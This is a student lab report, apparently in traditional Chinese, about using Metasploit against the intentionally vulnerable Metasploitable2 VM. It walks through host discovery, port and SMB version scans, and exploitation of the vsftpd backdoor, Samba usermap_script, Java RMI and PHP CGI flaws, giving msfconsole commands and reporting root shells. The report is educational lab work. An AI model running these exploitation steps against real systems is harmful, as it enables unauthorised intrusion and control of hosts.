20222407 2024-2025-1 《網路與系統攻防技術》實驗六實驗報告

Margarita0發表於2024-11-16

1.實驗內容
1.1 本週學習內容回顧
Metasploit 是一個功能強大的滲透測試框架,廣泛應用於網路安全領域。它為安全專家、滲透測試人員和紅隊提供了一個全面的工具集,支援漏洞利用、攻擊模擬和安全評估。Metasploit 提供了豐富的攻擊模組,涵蓋了遠端程式碼執行、服務拒絕、提權等多種攻擊方式,支援對多種作業系統和應用程式進行測試。除了漏洞利用,它還具備強大的後滲透功能,如鍵盤記錄、檔案上傳下載、網路嗅探等。透過與其他安全工具的整合,Metasploit 能夠幫助使用者快速識別、利用並修復潛在的安全漏洞,是網路安全行業中的重要工具之一。
1.2 實驗要求
本實踐目標是掌握metasploit的用法。
指導書參考Rapid7官網的指導教程。
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
下載官方靶機Metasploitable2,完成下面實驗內容。
查詢靶機IP地址,得到結果為192.168.1.114

查詢kail ip:192.1.113

ping:

2.實驗過程
2.1 前期滲透
2.1.1 主機發現(可用Aux中的arp_sweep,search一下就可以use)
search arp_sweep
use 0
set RHOSTS 192.168.1.0/24
set THREADS 30 run

成功查詢到靶機(192.168.1.114)
2.1.2 埠掃描:可以直接用nmap,也可以用Aux中的portscan/tcp等
search portscan/tcp
set ROHSTS 192.168.1.114
run

成功掃描出tcp埠。
2.1.3 掃描系統版本、漏洞

search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.1.114
run

目標主機執行的是一個較舊的 Samba 版本(3.0.20),且使用 SMBv1,可能存在一些已知漏洞。
2.2 Vsftpd原始碼包後門漏洞(21埠)
漏洞原理:在特定版本的vsftpd伺服器程式中,被人惡意植入程式碼,當使用者名稱以“😃”為結尾,伺服器就會在6200埠監聽,並且能夠執行任意程式碼。
search exploit/unix/ftp/vsftpd_234_backdoor
use 0
set RHOST 192.168.1.114
run

run攻擊成功執行後,再輸入uname –a、 pwd、 id等命令 驗證。

2.3 SambaMS-RPC Shell命令注入漏洞(埠139)
漏洞原理:Samba中負責在SAM資料庫更新使用者口令的程式碼未經過濾便將使用者輸入傳輸給了/bin/sh。如果在呼叫smb.conf中定義的外部指令碼時,透過對/bin/sh的MS-RPC呼叫提交了惡意輸入的話,就可能允許攻擊者以nobody使用者的許可權執行任意命令。
search exploit/multi/samba/usermap_script
use 0
set RHOST 192.168.1.114
exploit

利用成功 執行uname –a驗證

2.4 Java RMI SERVER命令執行漏洞(1099埠)
漏洞原理:Java RMI Server的RMI登錄檔和RMI啟用服務的預設配置存在安全漏洞,可被利用導致程式碼執行。
search exploit/multi/misc/java_rmi_server
use 0
show options //檢視配置引數
set RHOST 192.168.1.114
exploit


執行成功,輸入sessions -i 3進入任務
再輸入shell,利用whoami命令驗證,得到結果root。

2.5 PHP CGI引數執行注入漏洞(80埠)
漏洞原理:CGI指令碼沒有正確處理請求引數,導致原始碼洩露,允許遠端攻擊者在請求引數中插入執行命令。
search exploit/multi/http/php_cgi_arg_injection
use 0
set RHOST 192.168.1.114
Exploit

攻擊成功,輸入dir驗證。

3.問題及解決方案
一開始掃描的時候,沒有開root許可權導致無法攻擊成功。
4.學習感悟、思考等
在進行 Metasploit 攻擊滲透實踐後,深感網路安全領域如同一個充滿隱秘通道和堅固壁壘的迷宮。這種實踐讓我認識到,每一個看似安全的系統都可能存在潛在的脆弱點,而 Metasploit 這樣強大的工具就像一把雙刃劍。一方面,它讓我們瞭解到攻擊者可能利用的手段,從資訊收集到漏洞利用,再到獲取目標系統的控制權,步驟的連貫性和簡易性令人警醒。這使我們明白,在構建防禦體系時,不能放過任何一個環節,必須要有全面且深入的安全策略。

另一方面,它也強調了道德責任的重要性。擁有這樣的技術能力,如果被用於惡意目的,可能會對個人、企業乃至整個社會造成不可估量的損害。這讓我意識到網路安全從業者不僅要有精湛的技術,更要有堅定的道德操守,要將自己的知識用於保護資訊資產,而不是破壞。這種實踐如同一面鏡子,反射出網路安全攻防背後複雜的人性和倫理問題。

同時,實踐也凸顯了持續學習的必要性。網路環境不斷變化,新的漏洞和攻擊方式層出不窮,我們必須時刻保持警惕,不斷更新知識,才能在這場網路安全的較量中保持領先,守護好網路世界的安全防線。

相關文章